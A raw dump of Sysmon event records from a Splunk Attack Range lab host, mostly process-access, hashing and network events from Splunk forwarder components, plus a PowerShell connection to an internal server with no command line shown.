13:16:24.193{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497235Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.193{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497234Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.193{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497233Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.193{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A0A8-6140-7A56-04000000C801}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497232Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.193{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A0A8-6140-7A56-04000000C801}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497231Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.178{B81B27B7-A0A8-6140-7A56-04000000C801}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497252Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:25.246{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82EA798A2ECA8EB6A1918F24198320D0,SHA256=2F5C21AE673B97F3CDC2B4FFF222AC8021DFF034B413133CCA1F426E016D1E17,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497251Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:25.192{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=00E33A2B427807593E8BDAE241DB3DA1,SHA256=12C542A7E22CE215E4B15A24F9CD936C10254BADF48A875D3EBBDB225E7857D0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497250Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:25.192{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3137BA80495BA1C933F37E1A719FD452,SHA256=0D34B568C0D2C90506F5230B9E39EB1A11E1CB1E7EB16C71C027F53348E87E1A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497253Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:26.278{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92CDF606F851B2707F3F459B0D4EDC46,SHA256=02E73B3E6867064749F13EF510B3317DB5F1903009E1A7290FD768207C8F91FF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497255Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:27.292{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBF2EAB974C64B46356FCD7D3CAA0464,SHA256=E0EA51A07AC5EBD3CA9970F0FED9F5D9222F0AD4E74C46965F7D5386614444A5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497254Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:27.245{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B4697A6355A6B6DB5696629D67FD58CD,SHA256=1DF854F78E3226DD47F29FB91BCA5D95F4BE66DB8EDDD4D651EE0A522CE1A95A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497257Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:57.913{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50511-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497256Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:28.308{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6ED17E859D696F445C5E4FCA38677F1C,SHA256=B02E9C0BFDF0AB76EEF485047CCA41F94F5784EFFD0CF306B9430FA12C5221E9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497258Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:29.342{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0100276423AD74576663327E6575D37,SHA256=88B7D4CC500867AEE17A7134DCE9C6BEA136BD7FA7C0C4B21607C2101CCDF9E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000036497261Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:16:30.725{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7a96a-0xbb737d60) 354300x800000000000000036497260Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:59.792{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50512-false10.0.1.12-8000- 23542300x800000000000000036497259Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:30.357{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC601567C42F5842BE6B7183F9E92C95,SHA256=0FBB44FE13455EAE0C598761BBF8693B4314E4BC28F901699860AC8EE11054C2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497262Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:31.387{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE6CA5B5C21EC83114EA09DDE6C5127D,SHA256=ABD306FEB728657CC0A07AD76E6686399D8F7B3123F145561BBFA27968D291F7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497265Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:02.338{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-987.attackrange.local123ntpfalse168.61.215.74-123ntp 23542300x800000000000000036497264Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:32.523{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497263Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:32.403{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F26AD23EB8B5CDD5F5167724B9247064,SHA256=771AF309B0DA5AA3030E174DEDD2574EF6515743191C7AE78CA4E8CD0484D9FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497268Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:03.922{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50513-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497267Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:33.422{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A41A748686F46BF0DBB2B9B0814C796,SHA256=A5724EAF9F4EC930C40C048FDB31CB9ACD506D35DEF55C958AD491C08662C3E4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497266Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:33.338{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AA72BB59C7A75F2BDF39B106E4EF4459,SHA256=6094EC3FDD9474E84EA1F79A542E48DAE951819BB83E2874F2D3412F0F0A9EA3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497270Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:04.184{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50514-false10.0.1.12-8089- 23542300x800000000000000036497269Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:34.437{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80DCA2EDE8B766D7D4ECCA39F15F7BDB,SHA256=C8BA37C106998657745EB18E6B6E4564023724937FA2969B2A1BB47EC317A5A9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497272Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:04.805{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50515-false10.0.1.12-8000- 23542300x800000000000000036497271Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:35.451{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=482B2075F6D1AA04F0CE1E838498A0A6,SHA256=9A756DE5F0F1911F6280662489087B55796BD3DD452C5628E7B64D1A9D7CEA4E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497273Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:36.499{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FADBED9EBBA38357359B2D10D199F91,SHA256=0BB21B945F1BBA604826536A2103A4C0E1EA9118A2A61712785B69CF2D1A8227,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497282Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:37.902{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A0B5-6140-7C56-04000000C801}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497281Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:37.902{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497280Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:37.902{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497279Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:37.902{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497278Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:37.902{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497277Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:37.902{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A0B5-6140-7C56-04000000C801}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497276Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:37.902{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A0B5-6140-7C56-04000000C801}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497275Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:37.897{B81B27B7-A0B5-6140-7C56-04000000C801}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497274Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:37.518{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16B44DC7746DE91DA128C94C6FCB7D51,SHA256=88D1DB23E38188270E5321DA81A10CD6F38ED16F8EB3BCD93118717DF1ECEE78,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497297Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:38.917{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1CD1DC7C7903F7BD1B9EE90A45EDC1E5,SHA256=2B6C4505EE26AF26FC9E38ED582D897E8F0C992A52D16C642038E4497FB513E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497296Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:38.917{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=00E33A2B427807593E8BDAE241DB3DA1,SHA256=12C542A7E22CE215E4B15A24F9CD936C10254BADF48A875D3EBBDB225E7857D0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497295Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:38.801{B81B27B7-A0B6-6140-7D56-04000000C801}67966128C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program 